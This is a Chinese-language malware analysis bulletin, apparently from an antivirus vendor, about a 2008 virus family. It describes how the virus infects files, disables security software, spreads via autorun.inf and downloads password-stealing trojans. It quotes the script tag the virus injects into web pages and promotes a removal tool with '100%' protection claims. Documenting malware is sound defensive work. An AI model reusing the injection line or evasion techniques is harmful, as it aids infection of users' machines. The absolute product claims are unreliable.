查杀木马0x01xx8p.exe,Windows.ext,MSDOS.bat,zzz.sys

原创,转载需注明出处:

根据我们蜜罐这网络反馈的情况,0x01xx8p.exe,Windows.ext,MSDOS.bat,zzz.sys这些病毒成为4-5月份感染用户电脑的主力。力压机器狗和磁碟机病毒,成了现在名副其实的新毒王,这些病毒会遍历磁盘，感染全部的正常文件以及html网页文件，并试图关闭安全软件。接着，它连接病毒作者指定的服务器，下载其它的盗号木马到用户电脑中运行。

病毒现象:

1. 判断自己是否是在系统盘下的MSDOS.bat,如果是的话会将系统盘目录打开,创建目录C:\windows\Tasks,删除Task目录下的0x01xx8p.exe文件,将自身复制为c:\windows\Tasks\0x01xx8p.exe文件.

2. 创建一个线程,每隔1秒就设置一下系统时间为2000年1月1日,主要是为了让
卡巴斯基杀毒软件失效.

3. 复制自身到C:\spoolsv.exe,C:\windows\Tasks\spoolsv.ext ,C:\windows\Tasks\SysFile.brk,并删除自身文件.感染explorer.exe,先在C:\windows\tasks\释放被感染的explorer.ext 然后再保存到C:\windows\explorer.exe

4. 将要感染的病毒代码赋值到缓存,将被感染文件的最后一个节改名为.WYCao,注入被感染代码和自身病毒体,感染成功后替换原文件,修改注册表破坏隐藏文件的显示.

5.访问http://c.1**dm.com/config.txt然后拷贝到c:\windows\system32\windows.txt和c:\windows\system32\config.txt,按照windows.txt里的配置地址,下载很多盗号木马，复制到c:\windows\system32\ 并重命名为*.ext (*=a1,a2,a3…) 然后运行c:\windows\system32\*.ext.

6. 遍历进程判断是否存在如下进程, avp.exe, kvsrvxp.exe, kissvc.exe,如果存在的话则强制结束.

7.感染xml/cgi/jsp/php/aspx/asp/shtml/shtm/html/htm文件加入<script language="JavaScript" src=http://c.1**dm.com/one/arp.js></script>，删除所有的.gho文件。感染系统目录以外的scr/com/cmd/bat/exe.

8.释放C:\zzz.sys，创建服务加载,直接控制硬盘,破掉还原系统,这一点对网吧破坏极大.

9.遍历固定磁盘和可移动磁盘，在各个分区根目录下创建隐藏的系统属性文件autorun.inf和MSDOS.BAT.利用autorun.inf文件特性,用户打开磁盘就会中毒.

病毒分析:

该病毒利用了以前很多病毒的破坏性,有autorun.inf感染,感染exe文件,感染html文件,
修改系统时间,终止反病毒软件进程,破坏还原系统,删除用户的ghost备份文件,下载大量
盗号木马来窃取用户的QQ密码以及网络游戏密码,所以个人用户感染后手工是不可能清除
的,只有借助反病毒软件清除.

如何预防这些木马病毒:

根据我们监测,这些木马主要是放在网页上,利用realplayer和IE浏览器的漏洞感染用户电脑,木马清除大师2008 100%防范网页木马和realplayer漏洞木马,所以安装有木马清除大师2008的电脑不会受这些木马的袭击.

防范Realplayer木马:http://www.lofocus.com/News/20071229165433.html

100%防范网页木马:http://www.lofocus.com/News/2007111141815.html


查杀这些木马病毒:

个人用户感染这些木马后手工查杀是不可能的,只有借助反病毒软件清除,目前木马清除大师2008能完整清除这些木马及其变种,下载地址:http://www.lofocus.com/download

最好进入安全模式使用木马清除大师2008全面扫描,并手工修改注册表恢复查看隐藏文件:

修改注册表查看隐藏文件:http://www.lofocus.com/News/20071129142754.html

怎样进入安全模式:http://www.lofocus.com/News/20071024123538.html